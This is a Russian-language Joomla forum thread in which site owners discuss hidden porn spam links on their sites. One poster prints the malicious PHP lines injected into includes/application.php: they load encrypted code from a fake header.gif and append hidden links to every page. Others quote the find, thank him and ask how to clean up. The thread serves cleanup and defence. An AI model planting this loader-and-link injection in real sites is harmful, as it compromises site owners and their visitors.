Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 35 Ответов
  • 16615 Просмотров
*

OSTAP

  • Осваиваюсь на форуме
  • 37
  • 1 / 0
Re: Появились порно-ссылки
« Ответ #30 : 29.10.2013, 16:40:13 »
В общем нашел

Код был внедрен в includes/application.php

Строки
Код
// Render the document.

$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
$document_render_content = str_replace('</html>', '', $document_render_content);

include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
 
$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_ctrl."".@$sys_lctr."</div>\n</body>\n</html>";

JResponse::setBody($document_render_content);

Открываем /modules/mod_banners/header.gif' текстовым редактором и видим зашифрованный код

По логам вычислил дату изменения application.php я выяснил, какого числа в нем покопался нарушитель закона, был определен его IP и провайдер.
Даже знаю, кто это был.

Будем применять меры ))
*

komanche

  • Новичок
  • 9
  • 6 / 0
Re: Появились порно-ссылки
« Ответ #31 : 17.11.2013, 11:20:35 »
В общем нашел

Код был внедрен в includes/application.php

Строки
Код
// Render the document.

$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
$document_render_content = str_replace('</html>', '', $document_render_content);

include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
 
$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_ctrl."".@$sys_lctr."</div>\n</body>\n</html>";

JResponse::setBody($document_render_content);

Открываем /modules/mod_banners/header.gif' текстовым редактором и видим зашифрованный код

По логам вычислил дату изменения application.php я выяснил, какого числа в нем покопался нарушитель закона, был определен его IP и провайдер.
Даже знаю, кто это был.

Будем применять меры ))

Только что тоже удалил этот код на хосте. Спасибо вам огромное за такую инфу - 100500 плюсов:)
*

komanche

  • Новичок
  • 9
  • 6 / 0
Re: Появились порно-ссылки
« Ответ #32 : 17.11.2013, 11:23:23 »
и еще такой вопрос - это получается делал человек знающий Joomla ?
*

arma

  • Завсегдатай
  • 1753
  • 81 / 3
Re: Появились порно-ссылки
« Ответ #33 : 17.11.2013, 11:30:23 »
и еще такой вопрос - это получается делал человек знающий Joomla ?
Это значит, что кто-то пользуется варезом
*

Адель

  • Осваиваюсь на форуме
  • 41
  • 4 / 0
Re: Появились порно-ссылки
« Ответ #34 : 09.03.2014, 23:00:09 »
В общем нашел

Код был внедрен в includes/application.php

Строки
Код
// Render the document.

$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
$document_render_content = str_replace('</html>', '', $document_render_content);

include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
 
$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_ctrl."".@$sys_lctr."</div>\n</body>\n</html>";

JResponse::setBody($document_render_content);

Открываем /modules/mod_banners/header.gif' текстовым редактором и видим зашифрованный код

По логам вычислил дату изменения application.php я выяснил, какого числа в нем покопался нарушитель закона, был определен его IP и провайдер.
Даже знаю, кто это был.

Будем применять меры ))

Бро, для тупых объясни что нужно и где изменить. Модуль TransparentGum не удаляется. Что где удалять?
*

MaxDeni

  • Новичок
  • 1
  • 0 / 0
Re: Появились порно-ссылки
« Ответ #35 : 21.08.2014, 08:37:42 »
Здравствуйте, прошу помочь разобраться в проблеме.
сайт на Joomla 2.5. на главной странице сайта стал выскакивать посторонний текст на английском языке.
Если погуглить фрагменты данного текста, пример (The rise of the Internet in the late 1990s and early 2000s similarly changed the way pornography film was distributed and furthermore complicated the censorship regimes around the world and the legal prosecution of obscenity.), то выходят ссылки на множество зараженных сайтов на Joomla и WordPress, а также например статья на Wikipedia о порно-фильмах.
Забэкапил сайт через Akeeba, развернул на локальном хостинге, ничего не обнаруживется.
Данный блок текста встраивается или в заголовке главной страницы или если тут-же обновить, в теле страницы.
Помогите пожалуйста разобраться, где искать корни этого зловредства.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 499
Последний ответ 14.02.2024, 13:15:59
от wishlight
Непонятные ссылки в индексе Яндекс

Автор Forgiving

Ответов: 16
Просмотров: 1004
Последний ответ 13.09.2021, 14:17:20
от ForQue
Вирус на сайте, генерирующий ссылки на магазин.

Автор chernykh

Ответов: 15
Просмотров: 1584
Последний ответ 23.04.2018, 21:58:08
от ProtectYourSite
Ссылки типа ?page=Igri-onlajn-na-dengi-avtomati-vulkan

Автор orkl

Ответов: 4
Просмотров: 1100
Последний ответ 13.04.2017, 20:54:51
от ProtectYourSite
Левые ссылки на сайте. Как бороться?!

Автор k.upak

Ответов: 28
Просмотров: 1510
Последний ответ 20.02.2017, 20:18:44
от flyingspook